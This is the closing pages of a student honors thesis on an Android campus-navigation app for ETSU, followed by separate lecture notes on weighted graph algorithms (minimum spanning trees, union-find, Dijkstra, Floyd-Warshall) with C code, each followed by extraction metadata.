from my current location to the ETSU Amphitheater In order to get these particular locations, I needed a way to tell Google Maps exactly where they are. Fortunately, there is a simple way to do this: GPS coordinates. By going on the online version of Google Maps, I was able to pinpoint all of these key locations on campus and attain the GPS coordinates of that place. I input this in the application and made it so that the application will navigate you from where you currently are to the GPS position of the selected place. This section ended up working fantastically well, much better than I anticipated. Currently, this section is the one I felt turned out the best. “Food” Section The last major section of the application is the “Food” section. At this point in time, this section is still under construction, but there are design documents/engineering specifications/etc. so this section can be completed in a future build. This section will produce a list of locations to the user of various restaurants, grocery stores, etc. that are relatively close by to ETSU’s campus. From this list, the user will be able to filter the places by “Type” (such as restaurants, stores, etc.), whether or not ID Bucs are accepted there, and place them in alphabetical order. 
In addition, the places will be able to be selected by the user to open up Google Maps to provide driving directions to these places in the same manner it is done for the campus locations. This will be done by having a database with all of the relevant information hosted on campus. The application will not connect directly to this database due to security concerns, but will instead go through a Web Service. Android can create what are essentially pseudo-web pages to allow a user to do various tasks. In this particular instance, a web service will be invoked that requests a connection to the database hosted on ETSU’s server. It will provide credentials to prove that it is from a trusted source and then pull whatever information is needed from the database. It will then finally pass this information back to the application which will display it as needed. Reflection Overall, this was an incredibly beneficial project to work on, and I learned an immense amount from developing this application. Specifically, looking back on my development process, there are a few things that I would certainly change. One major hiccup was the development of an official application by ETSU before I got a chance to get steadily into my own development. In the future if I intend to create anything official for a business of company, I will definitely be in more contact with them to avoid a situation such as this. Secondly, my application is only currently accessible on Android platforms. If I were to start this project all over again, I would definitely utilize certain tools that allow a developer to create an application that easily spans Android, iOS, and Windows Phones. All of these different functions come together in this application to create a product that is functional as well as useful for the average ETSU college student. My intentions for this application are for it to coincide with ETSU’s current official application and maybe even have the official one take some ideas from mine for it to improve. I plan to turn over ownership of the application to ETSU following graduation and give them permission to implement any of my ideas or functionality if they so desire. Works Cited
{"Source-Url": "http://dc.etsu.edu/cgi/viewcontent.cgi?article=1236&context=honors", "len_cl100k_base": 4500, "olmocr-version": "0.1.48", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 35112, "total-output-tokens": 5322, "length": "2e12", "weborganizer": {"__label__adult": 0.0009403228759765624, "__label__art_design": 0.00070953369140625, "__label__crime_law": 0.0004391670227050781, "__label__education_jobs": 0.01543426513671875, "__label__entertainment": 0.0001691579818725586, "__label__fashion_beauty": 0.0004177093505859375, "__label__finance_business": 0.0004680156707763672, "__label__food_dining": 0.000843048095703125, "__label__games": 0.0013446807861328125, "__label__hardware": 0.0020427703857421875, "__label__health": 0.0004944801330566406, "__label__history": 0.0006074905395507812, "__label__home_hobbies": 0.0002334117889404297, "__label__industrial": 0.0003981590270996094, "__label__literature": 0.0007624626159667969, "__label__politics": 0.0003299713134765625, "__label__religion": 0.00060272216796875, "__label__science_tech": 0.003200531005859375, "__label__social_life": 0.0004658699035644531, "__label__software": 0.005535125732421875, "__label__software_dev": 0.96240234375, "__label__sports_fitness": 0.000560760498046875, "__label__transportation": 0.0012426376342773438, "__label__travel": 0.0003077983856201172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23442, 0.01229]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23442, 0.02349]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23442, 0.9591]], "google_gemma-3-12b-it_contains_pii": [[0, 725, false], [725, 1048, null], [1048, 2656, null], [2656, 4354, null], [4354, 6147, null], [6147, 7361, null], [7361, 8687, null], [8687, 9462, null], [9462, 11451, null], [11451, 13404, null], [13404, 14657, null], [14657, 15559, null], [15559, 16463, null], [16463, 17193, null], [17193, 19143, null], [19143, 19739, null], [19739, 20322, null], [20322, 22135, null], [22135, 23264, null], [23264, 23442, null]], "google_gemma-3-12b-it_is_public_document": [[0, 725, true], [725, 1048, null], [1048, 2656, null], [2656, 4354, null], [4354, 6147, null], [6147, 7361, null], [7361, 8687, null], [8687, 9462, null], [9462, 11451, null], [11451, 13404, null], [13404, 14657, null], [14657, 15559, null], [15559, 16463, null], [16463, 17193, null], [17193, 19143, null], [19143, 19739, null], [19739, 20322, null], [20322, 22135, null], [22135, 23264, null], [23264, 23442, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23442, null]], "pdf_page_numbers": [[0, 725, 1], [725, 
1048, 2], [1048, 2656, 3], [2656, 4354, 4], [4354, 6147, 5], [6147, 7361, 6], [7361, 8687, 7], [8687, 9462, 8], [9462, 11451, 9], [11451, 13404, 10], [13404, 14657, 11], [14657, 15559, 12], [15559, 16463, 13], [16463, 17193, 14], [17193, 19143, 15], [19143, 19739, 16], [19739, 20322, 17], [20322, 22135, 18], [22135, 23264, 19], [23264, 23442, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23442, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
dc06ec925eee635a839e5a26e5f7c5f6366f6710
Weighted Graph Algorithms

Beyond DFS/BFS exists an alternate universe of algorithms for *edge-weighted graphs*. Our adjacency list representation quietly supported these graphs:

```c
typedef struct edgenode {
    int y;                      /* adjacent vertex */
    int weight;                 /* edge weight */
    struct edgenode *next;      /* next edge in the list */
} edgenode;
```

Minimum Spanning Trees

A tree is a connected graph with no cycles. A spanning tree is a subgraph of $G$ which has the same set of vertices as $G$ and is a tree. A minimum spanning tree of a weighted graph $G$ is the spanning tree of $G$ whose edges sum to minimum weight. There can be more than one minimum spanning tree in a graph – consider a graph with identical weight edges.

Why Minimum Spanning Trees?

The minimum spanning tree problem has a long history – the first algorithm dates back at least to 1926! Minimum spanning tree is always taught in algorithm courses since (1) it arises in many applications, (2) it is an important example where greedy algorithms always give the optimal answer, and (3) clever data structures are necessary to make it work. In greedy algorithms, we make the decision of what to do next by selecting the best local option from all available choices, without regard to the global structure.

Applications of Minimum Spanning Trees

Minimum spanning trees are useful in constructing networks, by describing the way to connect a set of sites using the smallest total amount of wire. Minimum spanning trees provide a reasonable way for clustering points in space into natural groups. What are natural clusters in the friendship graph? One of the war stories in the text describes how to partition a graph into compact subgraphs by deleting large edges from the minimum spanning tree.

Minimum Spanning Trees and TSP

When the cities are points in the Euclidean plane, the minimum spanning tree provides a good heuristic for traveling salesman problems. The optimum traveling salesman tour is at most twice the length of the minimum spanning tree.

Prim's Algorithm

If $G$ is connected, every vertex will appear in the minimum spanning tree. If not, we can talk about a minimum spanning forest. Prim's algorithm starts from one vertex and grows the rest of the tree an edge at a time. As a greedy algorithm, which edge should we pick? The cheapest edge with which we can grow the tree by one vertex without creating a cycle.

Prim's Algorithm (Pseudocode)

During execution each vertex $v$ is either in the tree, *fringe* (meaning there exists an edge from a tree vertex to $v$) or *unseen* (meaning $v$ is more than one edge away).

**Prim-MST(G)**
- Select an arbitrary vertex $s$ to start the tree from.
- While (there are still non-tree vertices)
  - Select the edge of minimum weight between a tree and a non-tree vertex.
  - Add the selected edge and vertex to the tree $T_{prim}$.

This creates a spanning tree, since no cycle can be introduced, but is it minimum?

Prim's Algorithm in Action

[Figure: an example weighted graph $G$ and the spanning trees produced by Prim(G, A) and Kruskal(G).]

Why is Prim Correct?

We use a proof by contradiction: Suppose Prim's algorithm does not always give the minimum cost spanning tree on some graph. If so, there is a graph on which it fails. And if so, there must be a first edge $(x, y)$ Prim adds such that the partial tree $V'$ cannot be extended into a minimum spanning tree. But if $(x, y)$ is not in $MST(G)$, then there must be a path in $MST(G)$ from $x$ to $y$ since the tree is connected.
Let $(v, w)$ be the first edge on this path with exactly one endpoint in $V'$. Replacing it with $(x, y)$ we get a spanning tree with smaller weight, since $W(v, w) > W(x, y)$. Thus you did not have the MST!

Prim's Algorithm is correct! Thus we cannot go wrong with the greedy strategy the way we could with the traveling salesman problem.

How Fast is Prim's Algorithm?

That depends on what data structures are used. In the simplest implementation, we can simply mark each vertex as tree or non-tree and search always from scratch:

    Select an arbitrary vertex to start.
    While (there are non-tree vertices)
        select the minimum weight edge between tree and fringe
        add the selected edge and vertex to the tree

This can be done in $O(nm)$ time, by doing a DFS or BFS to loop through all edges, with a constant time test per edge, and a total of $n$ iterations.

Prim's Implementation

To do it faster, we must identify fringe vertices and the minimum cost edge associated with them quickly.

```c
prim(graph *g, int start)
{
    int i;                        /* counter */
    edgenode *p;                  /* temporary pointer */
    bool intree[MAXV];            /* is the vertex in the tree yet? */
    int distance[MAXV];           /* cheapest edge connecting each vertex to the tree */
    int v;                        /* current vertex to process */
    int w;                        /* candidate next vertex */
    int weight;                   /* edge weight */
    int dist;                     /* best current distance from start */

    for (i = 1; i <= g->nvertices; i++) {
        intree[i] = FALSE;
        distance[i] = MAXINT;
        parent[i] = -1;           /* parent[] is a global array recording tree edges */
    }

    distance[start] = 0;
    v = start;

    while (intree[v] == FALSE) {
        intree[v] = TRUE;
        p = g->edges[v];
        while (p != NULL) {
            w = p->y;
            weight = p->weight;
            if ((distance[w] > weight) && (intree[w] == FALSE)) {
                distance[w] = weight;
                parent[w] = v;
            }
            p = p->next;
        }

        v = 1;
        dist = MAXINT;
        for (i = 1; i <= g->nvertices; i++)
            if ((intree[i] == FALSE) && (dist > distance[i])) {
                dist = distance[i];
                v = i;
            }
    }
}
```

Prim's Analysis

Finding the minimum weight fringe-edge takes $O(n)$ time – just bump through the fringe list. After adding a vertex to the tree, running through its adjacency list to update the cost of adding fringe vertices (there may be a cheaper way through the new vertex) can be done in $O(n)$ time. Total time is $O(n^2)$.

Kruskal's Algorithm

Since an easy lower bound argument shows that every edge must be looked at to find the minimum spanning tree, and the number of edges $m = O(n^2)$, Prim's algorithm is optimal in the worst case. Is that all she wrote? The complexity of Prim's algorithm is independent of the number of edges. Can we do better with sparse graphs? Yes!

Kruskal's algorithm is also greedy. It repeatedly adds the smallest edge to the spanning tree that does not create a cycle.

Kruskal's Algorithm in Action

Why is Kruskal's algorithm correct?

Again, we use proof by contradiction. Suppose Kruskal's algorithm does not always give the minimum cost spanning tree on some graph. If so, there is a graph on which it fails. And if so, there must be a first edge $(x, y)$ Kruskal adds such that the set of edges cannot be extended into a minimum spanning tree. When we added $(x, y)$ there previously was no path between $x$ and $y$, or it would have created a cycle. Thus if we add $(x, y)$ to the optimal tree it must create a cycle. At least one edge in this cycle must have been added after $(x, y)$, so it must have a heavier weight. Deleting this heavier edge leaves a spanning tree lighter than the supposedly optimal tree, a contradiction!

How fast is Kruskal's algorithm?

What is the simplest implementation?
- Sort the $m$ edges in $O(m \lg m)$ time.
- For each edge in order, test whether it creates a cycle in the forest we have built thus far – if so discard it, else add it to the forest.

With a BFS/DFS, this cycle test can be done in $O(n)$ time (since the forest has at most $n$ edges). The total time is $O(mn)$, but can we do better?

Fast Component Tests Give Fast MST

Kruskal's algorithm builds up connected components. Any edge where both vertices are in the same connected component creates a cycle. Thus if we can maintain which vertices are in which component quickly, we do not have to test for cycles!

- **Same component**$(v_1, v_2)$ – Do vertices $v_1$ and $v_2$ lie in the same connected component of the current graph?
- **Merge components**$(C_1, C_2)$ – Merge the given pair of connected components into one component.

Fast Kruskal Implementation

    Put the edges in a heap
    count = 0
    while (count < n - 1) do
        get next edge (v, w)
        if (component(v) != component(w))
            add to T
            component(v) = component(w)

If we can test components in $O(\log n)$, we can find the MST in $O(m \log m)$!

Question: Is $O(m \log n)$ better than $O(m \log m)$?

Union-Find Programs

We need a data structure for maintaining sets which can test whether two elements are in the same set and merge two sets together. These can be implemented by *union* and *find* operations, where

- *Find(i)* – Return the label of the root of the tree containing element *i*, by walking up the parent pointers until there is nowhere to go.
- *Union(i, j)* – Link the root of one of the trees (say containing *i*) to the root of the tree containing the other (say *j*) so *find(i)* now equals *find(j)*.

Same Component Test

    Is s_i == s_j?
        t = Find(s_i)
        u = Find(s_j)
        Return (Is t = u?)

Merge Components Operation

    Make s_i == s_j
        t = Find(s_i)
        u = Find(s_j)
        Union(t, u)

We are interested in minimizing the time it takes to execute any sequence of unions and finds. A simple implementation is to represent each set as a tree, with pointers from a node to its parent. Each element is contained in a node, and the name of the set is the key at the root.

Worst Case for Union Find

In the worst case, these structures can be very unbalanced:

    For i = 1 to n/2 do
        UNION(i, i+1)
    For i = 1 to n/2 do
        FIND(1)

Who's The Daddy?

We want to limit the height of our trees, which are affected by unions. When we union, we can make the tree with fewer nodes the child. Since the number of nodes is related to the height, the height of the final tree will increase only if both subtrees are of equal height! If $\text{Union}(t, v)$ attaches the root of $v$ as a subtree of $t$ iff the number of nodes in $t$ is greater than or equal to the number in $v$, then after any sequence of unions, any tree with $k$ nodes has height at most $\lceil \lg k \rceil$.

Proof

By induction on the number of nodes $k$; $k = 1$ has height 0. Let $d_i$ be the height of the tree $t_i$.

If $(d_1 > d_2)$ then $d = d_1 \leq \lceil \log k_1 \rceil \leq \lceil \log(k_1 + k_2) \rceil = \lceil \log k \rceil$.

If $(d_1 \leq d_2)$, then $k_1 \geq k_2$, so $d = d_2 + 1 \leq \lceil \log k_2 \rceil + 1 = \lceil \log 2k_2 \rceil \leq \lceil \log(k_1 + k_2) \rceil = \lceil \log k \rceil$.

Can we do better?

We can do unions and finds in $O(\log n)$, good enough for Kruskal's algorithm. But can we do better?
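Before turning to that question, here is a minimal C sketch of the structure just described, using union by size; the type and function names and the fixed SETSIZE bound are illustrative choices, not part of the notes.

```c
#define SETSIZE 1000                /* illustrative maximum number of elements */

typedef struct {
    int parent[SETSIZE + 1];        /* parent[i] = parent of element i */
    int size[SETSIZE + 1];          /* size[i] = number of elements in i's subtree */
    int n;                          /* number of elements */
} union_find;

void uf_init(union_find *s, int n)
{
    int i;
    s->n = n;
    for (i = 1; i <= n; i++) {
        s->parent[i] = i;           /* each element starts as its own root */
        s->size[i] = 1;
    }
}

int uf_find(union_find *s, int x)
{
    while (s->parent[x] != x)       /* walk up parent pointers to the root */
        x = s->parent[x];
    return x;
}

int same_component(union_find *s, int x, int y)
{
    return uf_find(s, x) == uf_find(s, y);
}

void uf_union(union_find *s, int x, int y)
{
    int r1 = uf_find(s, x);
    int r2 = uf_find(s, y);
    if (r1 == r2)
        return;                     /* already in the same component */
    /* attach the root of the smaller tree below the root of the larger one */
    if (s->size[r1] >= s->size[r2]) {
        s->parent[r2] = r1;
        s->size[r1] += s->size[r2];
    } else {
        s->parent[r1] = r2;
        s->size[r2] += s->size[r1];
    }
}
```

With this structure, Kruskal's inner step on edge $(v, w)$ becomes: if `!same_component(&s, v, w)`, add the edge to the tree and call `uf_union(&s, v, w)`.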
The ideal Union-Find tree has depth 1: On a find, if we are going down a path anyway, why not change the pointers to point to the root? This path compression will let us do better than $O(n \log n)$ for $n$ union-finds. $O(n)$? Not quite. Difficult analysis shows that it takes $O(n \alpha(n))$ time, where $\alpha(n)$ is the inverse Ackermann function and $\alpha($number of atoms in the universe$) = 5$.

Problem of the Day

Suppose we are given the minimum spanning tree $T$ of a given graph $G$ (with $n$ vertices and $m$ edges) and a new edge $e = (u, v)$ of weight $w$ that we will add to $G$. Give an efficient algorithm to find the minimum spanning tree of the graph $G + e$. Your algorithm should run in $O(n)$ time to receive full credit, although slower but correct algorithms will receive partial credit.

Finding the shortest path between two nodes in a graph arises in many different applications:

- Transportation problems – finding the cheapest way to travel between two locations.
- Motion planning – what is the most natural way for a cartoon character to move about a simulated environment?
- Communications problems – how long will it take for a message to get between two places? Which two locations are furthest apart, i.e., what is the diameter of the network?

Shortest Paths and Sentence Disambiguation

In our work on reconstructing text typed on an (overloaded) telephone keypad, we had to select which of many possible interpretations was most likely. We constructed a graph where the vertices were the possible words/positions in the sentence, with an edge between possible neighboring words.

GIVE ME A RING.

The weight of each edge is a function of the probability that these two words will be next to each other in a sentence. 'hive me' would be less than 'give me', for example. The final system worked extremely well – identifying over 99% of characters correctly based on grammatical and statistical constraints. Dynamic programming (the Viterbi algorithm) can be used on the sentences to obtain the same results, by finding the shortest paths in the underlying DAG.

Shortest Paths: Unweighted Graphs

In an unweighted graph, the cost of a path is just the number of edges on the shortest path, which can be found in $O(n+m)$ time via breadth-first search. In a weighted graph, the weight of a path between two vertices is the sum of the weights of the edges on the path. BFS will not work on weighted graphs because sometimes visiting more edges can lead to a shorter distance, i.e., $1 + 1 + 1 + 1 + 1 + 1 + 1 + 1 < 10$. Note that there can be an exponential number of shortest paths between two nodes – so we cannot report all shortest paths efficiently.

Negative Edge Weights

Note that negative cost cycles render the problem of finding the shortest path meaningless, since you can always loop around the negative cost cycle more times to reduce the cost of the path. Thus in our discussions, we will assume that all edge weights are positive. Other algorithms deal correctly with negative cost edges. Minimum spanning trees are unaffected by negative cost edges.

Dijkstra's Algorithm

The principle behind Dijkstra's algorithm is that if $s, \ldots, x, \ldots, t$ is the shortest path from $s$ to $t$, then $s, \ldots, x$ had better be the shortest path from $s$ to $x$. This suggests a dynamic programming-like strategy, where we store the distance from $s$ to all nearby nodes, and use them to find the shortest path to more distant nodes.
Initialization and Update

The shortest path from $s$ to $s$ is $d(s, s) = 0$. If all edge weights are positive, the *smallest* edge incident to $s$, say $(s, x)$, defines $d(s, x)$. We can use an array to store the length of the shortest path to each node. Initialize each entry to $\infty$ to start. As soon as we establish the shortest path from $s$ to a new node $x$, we go through each of its incident edges to see if there is a better way from $s$ to other nodes through $x$.

Pseudocode: Dijkstra's Algorithm

    known = {s}
    for i = 1 to n, dist[i] = infinity
    for each edge (s, v), dist[v] = d(s, v)
    last = s
    while (last != t)
        select v such that dist(v) = min over unknown vertices of dist(i)
        for each edge (v, x), dist[x] = min(dist[x], dist[v] + w(v, x))
        last = v
        known = known + {v}

Complexity: $O(n^2)$. This is essentially the same as Prim's algorithm.

Dijkstra Example

Dijkstra's Implementation

See how little changes from Prim's algorithm!

```c
void dijkstra(graph *g, int start)    /* WAS prim(g, start) */
{
    int i;                            /* counter */
    edgenode *p;                      /* temporary pointer */
    bool intree[MAXV];                /* is the vertex in the tree yet? */
    int distance[MAXV];               /* distance vertex is from start */
    int v;                            /* current vertex to process */
    int w;                            /* candidate next vertex */
    int weight;                       /* edge weight */
    int dist;                         /* best current distance from start */

    for (i = 1; i <= g->nvertices; i++) {
        intree[i] = FALSE;
        distance[i] = MAXINT;
        parent[i] = -1;
    }

    distance[start] = 0;
    v = start;

    while (intree[v] == FALSE) {
        intree[v] = TRUE;
        p = g->edges[v];
        while (p != NULL) {
            w = p->y;
            weight = p->weight;
            if (distance[w] > (distance[v] + weight)) {      /* CHANGED */
                distance[w] = distance[v] + weight;          /* CHANGED */
                parent[w] = v;
            }
            p = p->next;
        }

        v = 1;
        dist = MAXINT;
        for (i = 1; i <= g->nvertices; i++)
            if ((intree[i] == FALSE) && (dist > distance[i])) {
                dist = distance[i];
                v = i;
            }
    }
}
```

Prim's/Dijkstra's Analysis

Finding the minimum weight fringe-edge takes $O(n)$ time – just bump through the fringe list. After adding a vertex to the tree, running through its adjacency list to update the cost of adding fringe vertices (there may be a cheaper way through the new vertex) can be done in $O(n)$ time. Total time is $O(n^2)$.

Improved Time Bounds

An $O(m \lg n)$ implementation of Dijkstra's algorithm would be faster for sparse graphs, and comes from using a heap of the vertices (ordered by distance), and updating the distance to each vertex (if necessary) in $O(\lg n)$ time for each edge out from freshly known vertices. Even better, $O(n \lg n + m)$ follows from using Fibonacci heaps, since they permit one to do a decrease-key operation in $O(1)$ amortized time.

All-Pairs Shortest Path

Notice that finding the shortest path between a pair of vertices $(s, t)$ in the worst case requires first finding the shortest path from $s$ to all other vertices in the graph. Many applications, such as finding the center or diameter of a graph, require finding the shortest path between all pairs of vertices. We can run Dijkstra's algorithm $n$ times (once from each possible start vertex) to solve the all-pairs shortest path problem in $O(n^3)$. Can we do better?

Dynamic Programming and Shortest Paths

The four-step approach to dynamic programming is:

1. Characterize the structure of an optimal solution.
2. Recursively define the value of an optimal solution.
3. Compute this recurrence in a bottom-up fashion.
4. Extract the optimal solution from computed information.
Initialization

From the adjacency matrix, we can construct the following matrix:

$$D[i, j] = \begin{cases} \infty & \text{if } i \neq j \text{ and } (v_i, v_j) \notin E \\ w(i, j) & \text{if } (v_i, v_j) \in E \\ 0 & \text{if } i = j \end{cases}$$

This tells us the shortest path going through no intermediate nodes.

There are several ways to characterize the shortest path between two nodes in a graph. Note that the shortest path from $i$ to $j$, $i \neq j$, using at most $M$ edges consists of the shortest path from $i$ to $k$ using at most $M - 1$ edges plus $W(k, j)$ for some $k$. This suggests that we can compute all-pairs shortest paths with an induction based on the number of edges in the optimal path.

Recurrence on Path Length

Let $d[i, j]^m$ be the length of the shortest path from $i$ to $j$ using at most $m$ edges.

What is $d[i, j]^0$?

$$d[i, j]^0 = \begin{cases} 0 & \text{if } i = j \\ \infty & \text{if } i \neq j \end{cases}$$

What if we know $d[i, j]^{m-1}$ for all $i, j$?

$$d[i, j]^m = \min\left(d[i, j]^{m-1}, \min_{1 \leq k \leq n}\left(d[i, k]^{m-1} + w[k, j]\right)\right) = \min_{1 \leq k \leq n}\left(d[i, k]^{m-1} + w[k, j]\right)$$

since $w[k, k] = 0$.

Not Floyd Implementation

This gives us a recurrence, which we can evaluate in a bottom-up fashion:

    for i = 1 to n
        for j = 1 to n
            d[i, j]^m = infinity
            for k = 1 to n
                d[i, j]^m = min(d[i, j]^m, d[i, k]^{m-1} + w[k, j])

Time Analysis – Bummer

This is an $O(n^3)$ algorithm just like matrix multiplication, but it only goes from $m$ to $m + 1$ edges. Since the shortest path between any two nodes must use at most $n$ edges (unless we have negative cost cycles), we must repeat that procedure $n$ times ($m = 1$ to $n$) for an $O(n^4)$ algorithm. Although this is slick, observe that even $O(n^3 \log n)$ is slower than running Dijkstra's algorithm starting from each vertex!

The Floyd-Warshall Algorithm

An alternate recurrence yields a more efficient dynamic programming formulation. Number the vertices from 1 to $n$. Let $d[i, j]^k$ be the shortest path from $i$ to $j$ using only vertices from $1, 2, \ldots, k$ as possible intermediate vertices. What is $d[i, j]^0$? With no intermediate vertices, any path consists of at most one edge, so $d[i, j]^0 = w[i, j]$.

Recurrence Relation

In general, adding a new vertex $k$ helps iff a path goes through it, so

$$d[i, j]^k = \begin{cases} w[i, j] & \text{if } k = 0 \\ \min\left(d[i, j]^{k-1},\; d[i, k]^{k-1} + d[k, j]^{k-1}\right) & \text{if } k \geq 1 \end{cases}$$

Although this looks similar to the previous recurrence, it isn't.

Implementation

The following algorithm implements it:

    d^0 = w
    for k = 1 to n
        for i = 1 to n
            for j = 1 to n
                d[i, j]^k = min(d[i, j]^{k-1}, d[i, k]^{k-1} + d[k, j]^{k-1})

This obviously runs in $\Theta(n^3)$ time, which is asymptotically no better than $n$ calls to Dijkstra's algorithm. However, the loops are so tight and it is so short and simple that it runs better in practice by a constant factor.
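The triple loop above translates almost directly into C. The sketch below updates a single distance matrix in place rather than keeping separate $d^k$ matrices; this is safe because entries in row $k$ and column $k$ do not change during pass $k$. The MAXV bound and the NO_EDGE sentinel (chosen large enough to act as infinity but small enough that adding two of them cannot overflow) are assumptions of this sketch.

```c
#include <limits.h>

#define MAXV 100                    /* illustrative maximum number of vertices */
#define NO_EDGE (INT_MAX / 2)       /* "infinity": safe to add two of these without overflow */

/* weight[i][j] holds w(i,j), NO_EDGE if there is no edge, and 0 on the diagonal.
 * On return, weight[i][j] is the length of the shortest path from i to j. */
void floyd_warshall(int weight[MAXV + 1][MAXV + 1], int n)
{
    int i, j, k;
    int through_k;                  /* length of the best i -> k -> j path seen */

    for (k = 1; k <= n; k++)
        for (i = 1; i <= n; i++)
            for (j = 1; j <= n; j++) {
                through_k = weight[i][k] + weight[k][j];
                if (through_k < weight[i][j])
                    weight[i][j] = through_k;
            }
}
```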
Problem of the Day

The *single-destination shortest path* problem for a directed graph is to find the shortest path *from* every vertex to a specified vertex $v$. Give an efficient algorithm to solve the single-destination shortest paths problem.

Problem of the Day

Let $G$ be a weighted directed graph with $n$ vertices and $m$ edges, where all edges have positive weight. A directed cycle is a directed path that starts and ends at the same vertex and contains at least one edge. Give an $O(n^3)$ algorithm to find a directed cycle in $G$ of minimum total weight. Partial credit will be given for an $O(n^2 m)$ algorithm.
{"Source-Url": "http://homepage.cs.uiowa.edu/~hzhang/c31/notes/ch06WGraph.pdf", "len_cl100k_base": 5994, "olmocr-version": "0.1.53", "pdf-total-pages": 62, "total-fallback-pages": 0, "total-input-tokens": 90348, "total-output-tokens": 8424, "length": "2e12", "weborganizer": {"__label__adult": 0.0006170272827148438, "__label__art_design": 0.0003781318664550781, "__label__crime_law": 0.00075531005859375, "__label__education_jobs": 0.000812530517578125, "__label__entertainment": 0.0001480579376220703, "__label__fashion_beauty": 0.00027632713317871094, "__label__finance_business": 0.00024187564849853516, "__label__food_dining": 0.0008463859558105469, "__label__games": 0.0018472671508789065, "__label__hardware": 0.002147674560546875, "__label__health": 0.001495361328125, "__label__history": 0.0005125999450683594, "__label__home_hobbies": 0.0002160072326660156, "__label__industrial": 0.0007224082946777344, "__label__literature": 0.000507354736328125, "__label__politics": 0.0003952980041503906, "__label__religion": 0.0009398460388183594, "__label__science_tech": 0.091064453125, "__label__social_life": 0.0001347064971923828, "__label__software": 0.00516510009765625, "__label__software_dev": 0.8876953125, "__label__sports_fitness": 0.0008835792541503906, "__label__transportation": 0.0017557144165039062, "__label__travel": 0.0004014968872070313}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21925, 0.02787]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21925, 0.66565]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21925, 0.87379]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 645, null], [645, 645, null], [645, 1197, null], [1197, 1537, null], [1537, 1686, null], [1686, 2055, null], [2055, 2431, null], [2431, 2978, null], [2978, 3096, null], [3096, 3428, null], [3428, 3744, null], [3744, 3877, null], [3877, 4400, null], [4400, 5070, null], [5070, 5559, null], [5559, 5886, null], [5886, 6365, null], [6365, 6395, null], [6395, 7034, null], [7034, 7118, null], [7118, 7500, null], [7500, 8001, null], [8001, 8393, null], [8393, 8968, null], [8968, 9101, null], [9101, 9206, null], [9206, 9487, null], [9487, 9654, null], [9654, 9940, null], [9940, 10194, null], [10194, 10585, null], [10585, 10843, null], [10843, 11113, null], [11113, 11523, null], [11523, 11990, null], [11990, 12327, null], [12327, 12343, null], [12343, 12653, null], [12653, 12807, null], [12807, 13396, null], [13396, 13801, null], [13801, 14209, null], [14209, 14679, null], [14679, 15330, null], [15330, 15347, null], [15347, 16013, null], [16013, 16552, null], [16552, 16890, null], [16890, 17337, null], [17337, 17833, null], [17833, 18144, null], [18144, 18488, null], [18488, 18921, null], [18921, 19350, null], [19350, 19671, null], [19671, 20127, null], [20127, 20548, null], [20548, 20835, null], [20835, 21301, null], [21301, 21549, null], [21549, 21925, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 645, null], [645, 645, null], [645, 1197, null], [1197, 1537, null], [1537, 1686, null], [1686, 2055, null], [2055, 2431, null], [2431, 2978, null], [2978, 3096, null], [3096, 3428, null], [3428, 3744, null], [3744, 3877, null], [3877, 4400, null], [4400, 5070, null], [5070, 5559, null], [5559, 5886, null], [5886, 6365, null], [6365, 6395, null], [6395, 7034, null], [7034, 7118, null], [7118, 7500, null], [7500, 8001, null], [8001, 8393, null], [8393, 8968, 
null], [8968, 9101, null], [9101, 9206, null], [9206, 9487, null], [9487, 9654, null], [9654, 9940, null], [9940, 10194, null], [10194, 10585, null], [10585, 10843, null], [10843, 11113, null], [11113, 11523, null], [11523, 11990, null], [11990, 12327, null], [12327, 12343, null], [12343, 12653, null], [12653, 12807, null], [12807, 13396, null], [13396, 13801, null], [13801, 14209, null], [14209, 14679, null], [14679, 15330, null], [15330, 15347, null], [15347, 16013, null], [16013, 16552, null], [16552, 16890, null], [16890, 17337, null], [17337, 17833, null], [17833, 18144, null], [18144, 18488, null], [18488, 18921, null], [18921, 19350, null], [19350, 19671, null], [19671, 20127, null], [20127, 20548, null], [20548, 20835, null], [20835, 21301, null], [21301, 21549, null], [21549, 21925, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 